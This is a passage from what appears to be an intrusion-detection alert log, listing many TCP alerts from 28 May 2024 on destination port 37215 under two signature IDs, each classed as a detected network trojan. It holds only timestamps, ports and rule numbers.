          Timestamp:05/28/24-14:47:14.922880
          SID:2835222
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975933
          SID:2835222
          Source Port:51044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808871
          SID:2829579
          Source Port:41632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232829
          SID:2835222
          Source Port:57094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939663
          SID:2835222
          Source Port:42644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401245
          SID:2829579
          Source Port:57214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764652
          SID:2835222
          Source Port:46478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560994
          SID:2829579
          Source Port:39968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914774
          SID:2829579
          Source Port:49534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083840
          SID:2835222
          Source Port:41844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196901
          SID:2829579
          Source Port:55976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592236
          SID:2835222
          Source Port:42388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141797
          SID:2835222
          Source Port:47204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816153
          SID:2835222
          Source Port:41476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547772
          SID:2829579
          Source Port:33496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913820
          SID:2835222
          Source Port:57908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.131191
          SID:2835222
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.672650
          SID:2835222
          Source Port:40950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154334
          SID:2835222
          Source Port:52106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197954
          SID:2835222
          Source Port:45176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953514
          SID:2835222
          Source Port:43662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.367107
          SID:2835222
          Source Port:47684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930918
          SID:2835222
          Source Port:46292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102962
          SID:2835222
          Source Port:44464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597630
          SID:2829579
          Source Port:35390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336922
          SID:2835222
          Source Port:56494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272880
          SID:2829579
          Source Port:48460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209331
          SID:2835222
          Source Port:58092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112238
          SID:2829579
          Source Port:39940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.723989
          SID:2829579
          Source Port:41918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.802765
          SID:2829579
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873823
          SID:2835222
          Source Port:42278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550520
          SID:2835222
          Source Port:33480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.153044
          SID:2829579
          Source Port:59728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756352
          SID:2835222
          Source Port:33874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922058
          SID:2835222
          Source Port:49664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297754
          SID:2829579
          Source Port:34026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177864
          SID:2829579
          Source Port:52754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160536
          SID:2835222
          Source Port:52036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861530
          SID:2829579
          Source Port:34794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095568
          SID:2829579
          Source Port:34602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909499
          SID:2835222
          Source Port:36564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681127
          SID:2835222
          Source Port:35290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846392
          SID:2835222
          Source Port:59718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473599
          SID:2829579
          Source Port:60816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216362
          SID:2835222
          Source Port:51410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548029
          SID:2829579
          Source Port:58610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187908
          SID:2829579
          Source Port:35400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.693311
          SID:2835222
          Source Port:51564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743366
          SID:2829579
          Source Port:57408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781050
          SID:2829579
          Source Port:44890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.500001
          SID:2835222
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213420
          SID:2829579
          Source Port:45312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201295
          SID:2835222
          Source Port:55866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543459
          SID:2829579
          Source Port:54694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.686448
          SID:2829579
          Source Port:48628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087817
          SID:2829579
          Source Port:53630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708835
          SID:2835222
          Source Port:48088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291477
          SID:2829579
          Source Port:58482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.856257
          SID:2835222
          Source Port:44990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890948
          SID:2835222
          Source Port:53352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961719
          SID:2829579
          Source Port:43628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839363
          SID:2835222
          Source Port:50588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079551
          SID:2835222
          Source Port:58142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665115
          SID:2829579
          Source Port:47804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.119143
          SID:2835222
          Source Port:41802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713484
          SID:2829579
          Source Port:38726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.988977
          SID:2835222
          Source Port:57120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763948
          SID:2829579
          Source Port:53706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061173
          SID:2835222
          Source Port:47576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242658
          SID:2835222
          Source Port:51894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102376
          SID:2835222
          Source Port:50886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229482
          SID:2829579
          Source Port:46054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103003
          SID:2829579
          Source Port:38602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176018
          SID:2835222
          Source Port:52654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215955
          SID:2829579
          Source Port:39782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480350
          SID:2829579
          Source Port:57742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932665
          SID:2829579
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.234926
          SID:2835222
          Source Port:56596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330017
          SID:2829579
          Source Port:59820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482012
          SID:2835222
          Source Port:44492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978899
          SID:2835222
          Source Port:59226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044601
          SID:2829579
          Source Port:42410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983569
          SID:2829579
          Source Port:60232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265790
          SID:2835222
          Source Port:50352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979621
          SID:2829579
          Source Port:33212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893573
          SID:2835222
          Source Port:46370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590712
          SID:2829579
          Source Port:57484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213604
          SID:2835222
          Source Port:33690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135984
          SID:2829579
          Source Port:47174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273336
          SID:2835222
          Source Port:55372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923772
          SID:2835222
          Source Port:50240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.908035
          SID:2829579
          Source Port:35700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116872
          SID:2829579
          Source Port:35570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117188
          SID:2835222
          Source Port:56858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993012
          SID:2829579
          Source Port:34462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980438
          SID:2835222
          Source Port:60560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266290
          SID:2835222
          Source Port:36282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151163
          SID:2835222
          Source Port:52700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635109
          SID:2829579
          Source Port:51810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732740
          SID:2835222
          Source Port:60336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960660
          SID:2829579
          Source Port:59252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299471
          SID:2835222
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278054
          SID:2829579
          Source Port:34480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334659
          SID:2829579
          Source Port:58978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543021
          SID:2835222
          Source Port:54264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.606960
          SID:2835222
          Source Port:46320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729630
          SID:2835222
          Source Port:43646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529191
          SID:2835222
          Source Port:36066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590714
          SID:2829579
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998658
          SID:2829579
          Source Port:42364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843060
          SID:2835222
          Source Port:33898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298749
          SID:2835222
          Source Port:41550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175624
          SID:2829579
          Source Port:53348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114578
          SID:2835222
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273542
          SID:2829579
          Source Port:33974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160839
          SID:2835222
          Source Port:44464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249950
          SID:2829579
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941591
          SID:2835222
          Source Port:37196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555156
          SID:2835222
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543520
          SID:2829579
          Source Port:52788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021446
          SID:2829579
          Source Port:60408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614596
          SID:2835222
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652484
          SID:2835222
          Source Port:57852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891527
          SID:2835222
          Source Port:49322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405503
          SID:2829579
          Source Port:46996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145244
          SID:2829579
          Source Port:40374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187908
          SID:2835222
          Source Port:55742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992289
          SID:2835222
          Source Port:41630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484599
          SID:2835222
          Source Port:35942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105427
          SID:2835222
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689527
          SID:2835222
          Source Port:57290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893939
          SID:2829579
          Source Port:54308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285759
          SID:2835222
          Source Port:46324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.085442
          SID:2835222
          Source Port:46132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627469
          SID:2829579
          Source Port:44026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973175
          SID:2835222
          Source Port:49720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859144
          SID:2835222
          Source Port:46708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770602
          SID:2835222
          Source Port:44848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140214
          SID:2829579
          Source Port:42524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724618
          SID:2835222
          Source Port:45568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048755
          SID:2829579
          Source Port:43956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062871
          SID:2835222
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093252
          SID:2835222
          Source Port:45498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949192
          SID:2829579
          Source Port:41720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475581
          SID:2829579
          Source Port:56482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922472
          SID:2835222
          Source Port:36144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.117881
          SID:2835222
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266421
          SID:2835222
          Source Port:45616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711225
          SID:2835222
          Source Port:60868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651282
          SID:2835222
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862942
          SID:2829579
          Source Port:33014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852627
          SID:2835222
          Source Port:47166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.564063
          SID:2829579
          Source Port:51470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526772
          SID:2829579
          Source Port:57984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681127
          SID:2829579
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147599
          SID:2829579
          Source Port:58876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271071
          SID:2835222
          Source Port:53956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.566438
          SID:2835222
          Source Port:49790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.621396
          SID:2829579
          Source Port:46134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475599
          SID:2835222
          Source Port:53680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268724
          SID:2835222
          Source Port:47060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711396
          SID:2835222
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215080
          SID:2829579
          Source Port:57636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164617
          SID:2835222
          Source Port:51666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663277
          SID:2835222
          Source Port:49798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156296
          SID:2835222
          Source Port:56500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689414
          SID:2829579
          Source Port:54382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095438
          SID:2829579
          Source Port:39866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338439
          SID:2835222
          Source Port:41576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962532
          SID:2829579
          Source Port:33524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927769
          SID:2829579
          Source Port:56356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660428
          SID:2829579
          Source Port:52958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143858
          SID:2835222
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.768384
          SID:2835222
          Source Port:47156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815441
          SID:2829579
          Source Port:53294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085447
          SID:2829579
          Source Port:34460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555104
          SID:2829579
          Source Port:52440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341166
          SID:2829579
          Source Port:35666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.689974
          SID:2835222
          Source Port:34236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858735
          SID:2829579
          Source Port:56264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.318979
          SID:2829579
          Source Port:40240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201810
          SID:2829579
          Source Port:44754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597436
          SID:2835222
          Source Port:51980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810621
          SID:2829579
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143710
          SID:2835222
          Source Port:33930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529191
          SID:2835222
          Source Port:38368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317249
          SID:2835222
          Source Port:54348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046780
          SID:2829579
          Source Port:45864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431594
          SID:2835222
          Source Port:48180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206967
          SID:2829579
          Source Port:53164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.629325
          SID:2829579
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462651
          SID:2829579
          Source Port:36996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876416
          SID:2829579
          Source Port:46926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350480
          SID:2835222
          Source Port:51870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103025
          SID:2835222
          Source Port:41690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592920
          SID:2829579
          Source Port:47496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352815
